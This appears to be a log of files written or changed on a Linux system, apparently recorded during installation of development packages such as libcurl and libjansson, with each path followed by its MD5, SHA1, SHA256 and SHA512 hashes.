SHA1 c1a189194843aba0b553ffe665c411e6b7ecd8fb
SHA256 3b4408b1868e1af4b711157152b58f56f37ca4646c0bc8baa184477911c63f13
SHA512 13f5012fce478b753cf35fe4b78cb4b3971e89a96420dbbe97e53ca133258ee4c61d577aa9b77aa352cfa9ff56d99b5d6831a4bc0995dbb5e48e938ab536bf46

/var/lib/dpkg/tmp.ci/shlibs

MD5 1cf2cd6872eea95e25a9776f4e493aa2
SHA1 62c2b4c8ddb8aa852d7d29c98b13a0e8c9ecd4c0
SHA256 f424d624f73dd5a0c6e0d9046a3f3f5d8ce13e510358755548bcee100c56f054
SHA512 1d4a9a6a58febaba452f6b56e72e29650f567df747357c065da5bc9b182a566d311e5edd567eb7abf140dd4df29cba16c4e679626f8b370718baa4b3544c6965

/var/lib/dpkg/tmp.ci/symbols

MD5 0c523af91f868f33d0cf0332b2f4055a
SHA1 a83b097b766e16a83fd914de2e7845e43ae5c5d9
SHA256 0f8f29463c5906d9731c2a007ea0286d97666c1da814c9884415412471cddb57
SHA512 74e8bf982773c56675e7e97df041bb6ccb216c25b4ef94da8f0bf761b9c14f06b706e040f6d2dea081795fd17eef7767a3df8641ba80992b998288f0fbf9a6dd

/var/lib/dpkg/tmp.ci/triggers

MD5 f35511f8b032613c9391cb110b4e4807
SHA1 b72a61a02a559c7fe4a0257b20856b9008a9fbd5
SHA256 0f1eda96d7595190cc2d40a06fafff8def651d19ceb635292ae6104de50de218
SHA512 af125a9319eac9f00ea5b5568b3984aeeecca518e642a3a49de5cabfaf8d11c714f13a7f78f77cf397955f942f860bfe2fdadda0ba1a5163141ebb94b777b499

/var/lib/dpkg/status-new

MD5 01f1c4b2fb8f6365104e08540089e525
SHA1 e83e77ae83d98dc68526bf5168893a10addaced8
SHA256 5423297626f27061bda7181657647434dcca0f186d9f60391fc5bc86ec9d6e38
SHA512 b2f4a844e42dd2deeeaf8e374f76ba8c1cf34e0a07c84d88ac5cabf0ed9fb6df5fc5fde55b733128003798a8c49cd2e29d83d2a2307e87c26dc301733d354974

/var/lib/dpkg/status-new

MD5 86dceb1269f0e3a72b85b6a990d013bf
SHA1 5d1446c0d265e286407ef993e7ad0b3f8db2b894
SHA256 8b00cb8de2518b33d4c3d397f0dd605b7e0b78673dfb8f03f47014279de7a487
SHA512 f4cecbfcfd472e2857b5958ed623944b7a724e949e46f14637ad86cc7ae87f972da45d0ebd39112171932cefa3ce0b9e6fa74d58636cbd221b59afede8cbdb62

/var/lib/dpkg/tmp.ci/conffiles

MD5 7fb8d59e7faecf6518fb9f76feebc527
SHA1 ebe2a35b012622e8de1dcad99b7d85dcbb6bfdae
SHA256 f7e711637368393ee8b3f9f315e449de719cbc033b4175baf7e9e9b39c30bc30
SHA512 585c91550abacbccd033db623924ddb89f3c16658568bc381f8759a329b52dd159ff9f540f1731b3ff1666fc754b436b69027d8b14c80557e984770a673fe3a0

/var/lib/dpkg/tmp.ci/control

MD5 c92ceab67a5afce3616f74232e3983cb
SHA1 7b083a9f532912ef52183ee5e30de2f21c6ac64b
SHA256 ca35a8fd21624468cfad2374949cae82e99f8aaac2f434ba30441446746d638d
SHA512 c04da8faa2fcde89a419119800af7fca63939be59106c39b0b4c0289bbda06fb1ecd5bbc99cb8392bfef63c9b25356c4fb4b1f577250d81e321b61cc2e4af937

/var/lib/dpkg/tmp.ci/postinst

MD5 b8eb4e1079f78c8e8aa8ae870a35c7cd
SHA1 ea86259eac12c40732df15c389a79b68842a313a
SHA256 16b00ffad29d16230dead385205ea543177fb6387dfbafd007f4a7bc90db81ee
SHA512 c0e09ec5a041197e98cc46f7815bb564493b2e7625939fccb068a55f4e1d38025cad3ec5b569fee441e0871be4fe1218df4e235d1dd82f1e21532f7c6e313d9a

/var/lib/dpkg/tmp.ci/control

MD5 a4ae04fb3b660374fdb9a612a52e2ecf
SHA1 4bca53a9de77dea672aa061efef0e66c2732ba94
SHA256 3e9f96ad957e217954414d7c055a53056e4aca5055e9c311a65983f8d63bb9b2
SHA512 cc7a2cee8f30da0e166b091260d6ebcd7df8c8e97f006999effd9e041d39727f4a9b7e143f32766fc6abe388f8ca7e56bf064f7facaeaf281b4e18385b9f559c

/var/lib/dpkg/tmp.ci/control

MD5 7cdd61371be8d69024fda4fd2f2a98e4
SHA1 413f9b546c5414e25d627d74fc7ca7d46bbfa46e
SHA256 643ecba1f37ced366d7d446e65310eeba23a28341e221a95ed20a9a4917d21f5
SHA512 c8a50150f6b11e6fac0884285e87a68b83c980e85935123f2f7f0e4617b0e330bc47ce8a58fd95dd53aa7474f722051b6836606dba85f0410b962f09bcb5af89

/var/lib/dpkg/tmp.ci/control

MD5 76dd160f1e3bdedfc1074c9a73a8e143
SHA1 fb30baea93f663cf26f271e5af8e1f02409e62c3
SHA256 899ece35835fd70d9d562269530df32b52678b435f54b0acf74837144f65020c
SHA512 569ff1f7304b84b0a7ce9989af879b46fcb0be7171f16061ce94b74f58c4c30ce38749f5ecd27793a35a594e7fd01789bf519d0b5d3ef47e4d77f2cedbe2c6fc

/var/lib/dpkg/tmp.ci/preinst

MD5 341e2ed2fe955d296073c4e14d3823ca
SHA1 ca85ebe0b86e07b0d2f9eae544eb4465e8f10796
SHA256 689a194bb2f3dff7aba6aa2a03e0cf0ac9027f7ed5ea4ec8fee48bc61ad321b3
SHA512 1ef98c73c5908ec1f4f4a9ad9ad1029b009c08e39d0a0dec5360839cd0b614e395d12ce7b2653c0a7d1885f0d93e4098b631f23d0bf8e72e3bccf47a2e843587

/var/lib/dpkg/tmp.ci/prerm

MD5 d08a76af8d50462b60a378312cc4f585
SHA1 8555d8c45e65d4347e9a371fdca598be95f4d614
SHA256 96b8be2538c9212341493a9989e752a674c51da94dfcf91128ebc1f16ea89130
SHA512 acdabb296974dbda0f3ce7e2e095eb8a7db95156d433b10513c2aa6a4460750d9dc39a32813809bfed3c2a53446f27e82a0d61c7215c55bdc6c8c6ba96870222

/var/lib/dpkg/info/libcurl4-openssl-dev:amd64.list-new

MD5 5d484b4ecd30489eb1d3daee789e574f
SHA1 1bae401bffa4a50dd25730bcad4d430f59c37958
SHA256 7aee6ea1ad00dcb3aaa55d7739acb5dca6298de0d59180be0002085618b99f12
SHA512 716d16d61ada40ed6ba1047d39f3485a66f9e7fb8645c12f83c13fa62c26e47e07b8073bd63a26648db0197e93a164f614e6ec3bbdbe38a5355dbd154c7d5334

/var/lib/dpkg/info/libjansson-dev:amd64.list-new

MD5 7906c2641f4bf591db3b14d07ea1bbec
SHA1 7833a61f60490d04ab036dcd51920814d68be16d
SHA256 6cfff557bb3626458c3f34add188fc53c066a9a93dc6d76ddb24c2ad3b459507
SHA512 2b46de1055578a003cec65af42c949043c3f16cb0de32ec07066c598b45407390a19210ff832da9fb4cc930c77c53079eff19b63b79114f90a46e6a0a2fed19c

/var/lib/dpkg/status-new

MD5 e7d1478a643745beec1ddba2b78248a6
SHA1 39459a28dc90051dcf71ce4d6414bd11bf873c38
SHA256 8dd71cd792f945ba6d9d51e6bdcb21cdf5b43b538ed3acdb76c55e71523399aa
SHA512 17211c2669c7fa8f4d4b1a8079f7704c9303566d2d1f9db93e8131d1b74a65c01f6e4c3dd95cd86eee884f80bf9b8042dd6a0f0e2915945dd5e16abbed24df0c

/var/cache/man/2596

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/cache/ldconfig/aux-cache~

MD5 35f5175485c2b0a2ae2986e9fe7dcba3
SHA1 44633a14a3b9cbdb85521bb5065bd31fe385c3fb
SHA256 f075bf640a4f6511b0b84693341a1228432debe950e7ab9f6938a4fa3cc0a915
SHA512 5bc48c4db3442c01344b9e4f12830d31d65bc2729ff047905b8e34583ed245fc35185bc11380c9ac4d54de3e1aff0277c0aa4b7e0f6883b9b0d16aed9c1a8f56

/var/lib/dpkg/status-new

MD5 27079e02501bc8f0fd106273dbe0fd7b
SHA1 85ef5eada87f331b9f6edd735388f4cb69c96492
SHA256 7c39793f0686a7fcac0e69fa6050ab298049102fae5817809924399133386434
SHA512 7cc070f0ae98505a9bd9cba282604680815f1a43e87d174137d7dbbd97eace818b72961f89103d2f63f3cb205c8c59cfb82207910ed7ddad1c0512a444673cc5

/tmp/cc

MD5 4011d473f6b06caa7f3d514e4eeb2184
SHA1 529bda4d64920cac51baa6b34b8bcabf19d97248
SHA256 bf7d1a01e88322991a824676601b46be7625b50a9d8ee8de085cc86ba76f7bc2
SHA512 45f9da5d9f43c1876fc3659a8e7e03b9d06ec83bf6c8d237daf3809cbec01a5c59688a1cf4780d695750fc42920428ff69545f5dce11b888418df919c3625f39

/root/.wget-hsts

MD5 eae8c409f1284f73bf0df47f6e1efa3f
SHA1 5371af09dd5b914f7b9ca3774e303b747eadde0a
SHA256 3d6c7f77b8948d7b3f633f0391749c3844d5074a846911ae9325cac42e2c5fb7
SHA512 d3ea49da42a23c0eb7d91690196c94769ddb69838724b382b7ce2124847286ec2ead7b63857d475437dad7a8ee853aa2198f8f53596bb8b3f740841b3e3b44a1